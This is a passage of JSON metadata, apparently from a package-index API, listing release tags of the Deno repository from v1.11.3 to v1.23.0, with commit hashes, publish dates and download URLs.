","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.